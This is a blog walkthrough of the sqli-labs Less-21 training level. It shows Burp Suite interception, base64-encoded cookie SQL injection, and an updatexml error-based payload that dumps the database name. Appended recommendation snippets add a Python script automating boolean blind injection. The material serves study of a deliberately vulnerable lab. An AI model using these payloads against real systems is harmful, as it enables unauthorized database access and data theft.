sqli-labs/less-21;header头注入;burpsuite抓包;mysql注入;

最新推荐文章于 2024-07-24 08:30:00 发布
原创 最新推荐文章于 2024-07-24 08:30:00 发布 · 480 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#java #servlet #jvm

本文详细讲述了如何通过Burpsuite抓包,利用Base64编码实现Cookie头注入,进而进行SQL注入攻击。作者展示了从发现编码方式到利用updatexml函数暴漏数据库的过程,适合学习渗透测试和安全防护的读者。

1、输入正确账号登陆

 

 

2、这里使用burpsuite进行抓包

 3、这里使用打算使用cookie头注入,因为它页面有cookie回显;

看到uname编码方式中有%感觉有点像url;

 

发现是base64编码

 

这里选择base64编码; 

 

 

 

4、这里闭合失败

发现提示要使用   ')   进行闭合;

    

5、这里使用base64编码: 

admin') and 1=1 -- +

YWRtaW4nKSBhbmQgMT0xIC0tICs=

 

 闭合成功

6、查一下数据库

这里利用报错查询:updatexml

admin') and updatexml(1,concat(0x7e,database(),0x7e),1) -- +

YWRtaW4nKSBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsZGF0YWJhc2UoKSwweDdlKSwxKSAtLSAr

 

 

7、后面表名字段数据就随便爆了,如果不知道,可以看我之前的文章;

小乘杭
关注
请求注入神器 -- BurpHeaderHelper(Burpsuite、bp插件)
墨痕诉清风的博客
01-17 2850
1、加载插件: Extender -> Burp Extensions -> Add -> Select File... -> Next -> BurpHeaderHelper-xxx.jar。),通过一些浏览器的插件可以去除这些信息,但是实际的情况是总会有这些冒出来(可能是插件不给力或者我使用方式不对?BurpHeaderHelper是基于Burpsuite的插件,通过自定义规则的来对Http请求进行增删改操作。在服务器上查看对应的请求,可以看到相应的几个信息都被去除。
攻防世界-xff_referer
m0_49025459的博客
12-30 432
抓包看看,打开场景,页面提示我们ip必须是123.123.123.123,我们就想到burpsuite抓包添加上X-Forwarded-For:123.123.123.123。我们看到页面提示必须来自https://www.google.com,那我们添加Referer:https://www.google.com。
CustomHeader:此Burp Suite扩展允许您自定义标,并将新标放入HTTP REQUEST BurpSuite(扫描仪,入侵者,中继器,代理历史记录)
03-08
自定义标题-自动向整个BurpSuite HTTP请求添加新标题。 下载版本: 此Burp Suite扩展允许您自定义标,并将新标放入HTTP REQUEST BurpSuite(扫描仪,入侵者,中继器,代理历史记录),还可以选择要自定义的HTTP VERB。 用法 便于使用 ! :) 别忘了点击保存按钮! 变更日志 2019年10月24日-v1.0 首次公开发行 谢谢 瓦吉罗-https: 丹尼·努格拉哈(Denny Nugraha)-https:
redistemplate注入为null_「Burpsuite练兵场」SQL注入及相关实验(一)
weixin_39806779的博客
11-20 283
说到SQL注入漏洞,各位小伙伴一定是耳熟能详,作为一种常见的高危漏洞,其对于应用程序的损害是非常严重的。因此这也是一个在渗透测试的过程中具有高优先级的验证目标,所以将与之相关的实验进行优先讲述。本文是 i 春秋论坛作家「dll_s」表哥原创的Burpsuite练兵场系列文章,公众号旨在为大家提供更多的学习方法与技能技巧,文章仅供学习参考。SQL注入原理:SQL注入的原理其实并不难理解,Web应用程...
burp爆破mysql_Burpsuite intruder模块 越过token进行爆破,包含靶场搭建
weixin_29151301的博客
01-26 341
安装靶场链接:https://pan.baidu.com/s/19X0oC63oO2cQKK6UL5xgOw提取码:yq7f下载完成放入网站根目录点击初始化安装出现错误,进行跟踪发现是数据库密码不对的问题修改成自己的mysql数据库的登录信息返回浏览器页面,单击安装,出现下面红字就ok了接下来选择token防爆破开启浏览器代理抓到登录数据包右键,选择 发送到intruder模块—》attack t...
burp爆破mysql_Burpsuite系列 -- 爆破数据库名称
weixin_35796591的博客
02-23 1640
如果不是身上有烟,下雨天我都懒得打伞,如果不是有家人,我活着都嫌烦,如果不是有你,我都不想拥有最后的一点温柔。。。---- 网易云热评靶机环境:win7、phpstudy2018、sqli一、判断注入点1、页面正常访问的情况 2、在id=1后面加上and 1=1和and1=2分别进行测试,发现and1=2返回不正常,说明该处存在注入192.168.1.129/sqli/Less-2/?id=1 a...
使用Burpsuite对http部进行分析
weixin_52347768的博客
04-14 3557
POST与GET的区别 GET: GET把参数包含在URL中 GET请求在URL中传送的参数是有长度限制的 GET产生一个TCP数据包,浏览器会把http header和data一并发送出去,服务器响应200(返回数据) GET会被浏览器进行主动缓存 POST: POST通过request body传递参数 POST请求在URL中传送的参数是没有长度限制的 POST产生两个TCP数据包,浏览器先发送header,服务器响应100 contin...
【SQL注入-14】布尔盲注的半自动化注入案例—以sqli-labs-less8为例(利用BurpSuite工具)
m0_64378913的博客
05-12 1784
目录1 概述2 布尔盲注的半自动化注入案例2.1 实验平台2.2 实验过程2.2.1 注入前准备2.2.2 判断注入点及注入类型2.2.3 爆库名长度及库名2.2.4 爆表名、字段名以及账户及密码3 总结参考文章 本博客内容仅供学习探讨,请勿滥用乱用 1 概述 当改变浏览器带入给后台SQL的参数后,浏览器没有显示对应内容也没有显示报错信息时,无法使用union联合查询注入与报错注入,这时候可以试试看能否使用布尔注入。 布尔盲注:一般情况下,当带入参数为真和假时,页面会有不同的反映,比如有无显示也是
sqli-lab-less17
Sa1nZen的博客
08-04 263
sqli-lab-less17。
Sqli-labs-master靶场1-10通关教程
weixin_68416970的博客
07-24 2142
Sqli-labs-master靶场1-10的通关教程
Sqli-labs-master靶场1-20通关教程
weixin_68416970的博客
05-29 1952
Sqli-labs-master靶场1-20通关教程
SQLi-labs-Master(1-22)新手通关宝典
Myosotis_LL的博客
05-18 3342
欢迎来到《SQLi-labs-Master新手通关宝典》,本宝典专为网络安全新手编写,旨在引导他们深入了解SQL注入SQLi)这一严重的安全漏洞。SQL注入允许攻击者通过精心构造的输入来操纵数据库查询,从而获取、篡改或删除敏感数据。本篇将带领你从基础知识出发,逐步掌握SQL注入的原理、技术和防御策略。通过SQLi-labs等实验环境,你将有机会在真实场景中实践SQL注入攻击,并学习如何有效防御。无论你是开发人员、系统管理员、渗透测试人员还是网络安全爱好者,掌握SQL注入技术都将对你大有裨益。
请求注入神器 -- BurpHeaderHelper.jar使用教程(Burpsuite、bp插件)
weixin_65629944的博客
04-24 1755
BurpHttpHelper中已经内置提供了一些UserAgent,可以自行通过添加UserAgent字符串进行扩展。在丢弃数据包面板(DropPacketPanel)中可以查看该过滤的数据包信息(该模块还未完善,后续会进行完善。下图为服务器视角,接收到来自客户端的请求包,下边是一个demo例子,修改host位demo.com。有时候不想一些请求发送到目标服务器,可以通过丢弃数据包面板进行配置。服务器接收到的数据包将为不同的UserAgent。在规则面板中勾选随机UA。服务器接收到的数据包如下。
Header注入
笔墨稠思
11-06 2119
靶场 当我们使用get/post注入,发现特殊的符号或单词被设置了检测,被办了,我们可以尝试检测是否存在Header注入 什么是Header注入? 我们网页,在向服务器发送请求时,会携带一些信息 如图所示,Request Headers 这部分都是请求,这里面有一部分记录的是浏览器与服务器的链接状态,还有一些是记录我们的用户信息 例如:User-Agent 记录了我们当前操作系统,浏览器内核版本 Referer记录了我们的来源 当然,请求中内容不仅仅是这些,还可能存在cookie http-X-Fo
burpsuite 自定义插件-java 版本
freshfox的博客
05-21 1171
package burp; import java.awt.Color; import java.awt.Component; import java.awt.FlowLayout; import java.awt.event.FocusEvent; import java.awt.event.FocusListener; import java.awt.event.ItemEvent; im...
SQL注入漏洞解析(环境SQLi-labs)
twowords的博客
02-04 3660
SQL注入漏洞详解 什么是SQL注入 原理: Sql注入,由于Web应用程序对用户输入数据的合法性没有判断和过滤,导致后台SQL语句拼接了用户的输入。用户可以通过构造不同的Sql语句来实现对数据库的任意操作。(如:增删改查)。 解释:当我们用户在前端浏览器页面做一些事情的时候,当需要与数据库进行交互时,比如最简单的登陆账号,web应用程序接收到我们账号密码后,需要后台有这样一个数据库的命令,去查询数据库中是否有这样的一个账号密码与之对应,然后做出判断:是否存在用户名,若存在,用户名与密码是否相匹配。然而
burpsuite】核心使用方法
06-13 2680
【burp】快速上手
第一天 Burps uite 简单使用
代码审计
03-02 2609
第1章 1.1 RUL统一资源定位符 Sheme : 协议 http htttps 443 Login:passwod: 用户名 密码 不安全 @ddress:port:访问的地址 www.bing.com 443 Path/to resource:路径 知名协议 存在默认的端口 1.2 OSI七层模型 Tcp 和udp 都是传输层的协议 http : 是应用层的协议 http 超文本传输协议 http协议的特征? 无状态的协议 cookie存储在浏览器端 session存储在服务器端 1.
【SQL注入-12】http注入案例—基于Sqli-labs靶机(借助BurpSuite工具)
m0_64378913的博客
05-06 2820
目录1 概述1.1 User-Agent概述1.2 Referer 概述2 实验平台及实验目标2.1 实验平台2.2 实验目标3 User-Agent注入案例—以sqli-labs-Less18为例3.1 注入前准备3.2 判断注入点及注入类型3.3 获取库名表名字段名字段内容3.4 实验结果4 Referer注入案例—以sqli-labsLess19为例4.1 注入前准备4.2 判断注入点及注入类型4.3 获取库名表名字段名字段内容4.4 实验结果5 总结 本博客内容仅供学习探讨,请勿滥用
sqli-labs less5 盲注方法bp抓包解题
最新发布
09-10
SQLi - Labs Less 5 是一个基于布尔盲注的 SQL 注入实验。使用 Burp Suite 抓包来解决该题目的步骤如下: ### 1. 配置 Burp Suite 和浏览器 - 启动 Burp Suite,在“Proxy”选项卡中,点击“Options”,确保代理监听地址和端口(默认是 127.0.0.1:8080)正确。 - 配置浏览器代理,使其通过 Burp Suite 进行网络请求。以 Chrome 浏览器为例,可以使用 SwitchyOmega 等扩展来配置代理。 ### 2. 访问目标页面 打开浏览器,访问 sqli - labs less5 的目标页面,通常是类似 `http://your - lab - url/Less - 5/?id=1` 的链接。 ### 3. 开启拦截并发送请求 在 Burp Suite 的“Proxy”选项卡中,点击“Intercept”,确保拦截开关处于开启状态(“Intercept is on”)。在浏览器中刷新目标页面,此时请求会被 Burp Suite 拦截。 ### 4. 构造盲注请求 在 Burp Suite 的拦截窗口中,修改请求的 `id` 参数,构造布尔盲注的 SQL 语句。例如,判断数据库名的第一个字符是否为 `s`: ``` http://your - lab - url/Less - 5/?id=1' AND ASCII(SUBSTR(DATABASE(),1,1))=115 --+ ``` 这里 `ASCII(SUBSTR(DATABASE(),1,1))` 表示获取数据库名的第一个字符的 ASCII 码,`115` 是字符 `s` 的 ASCII 码,`--+` 是 SQL 注释符。 将修改后的请求发送到 Repeater 模块(右键点击请求,选择“Send to Repeater”)。 ### 5. 发送请求并分析响应 在 Repeater 模块中,点击“Go”发送请求。观察响应页面的变化,如果响应页面显示正常(与正常请求的页面相同),则说明判断条件成立;如果页面显示异常(如报错或页面内容不同),则说明判断条件不成立。 ### 6. 循环判断字符 通过不断修改 ASCII 码的值(从 32 到 126 循环尝试),可以逐个获取数据库名、表名、列名等信息。例如,使用 Python 脚本结合 Burp Suite 的 API 来自动化这个过程: ```python import requests url = "http://your - lab - url/Less - 5/?id=1' AND ASCII(SUBSTR(DATABASE(),{pos},1))={ascii} --+" database_name = "" pos = 1 while True: for ascii_code in range(32, 127): full_url = url.format(pos=pos, ascii=ascii_code) response = requests.get(full_url) if "You are in" in response.text: # 根据实际响应内容判断 database_name += chr(ascii_code) pos += 1 break else: break print("Database name:", database_name) ``` ### 7. 继续获取其他信息 使用类似的方法,可以获取表名、列名和数据等信息。例如,获取表名: ``` http://your - lab - url/Less - 5/?id=1' AND ASCII(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT {offset},1),{pos},1))={ascii} --+ ``` 其中 `{offset}` 用于遍历不同的表。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值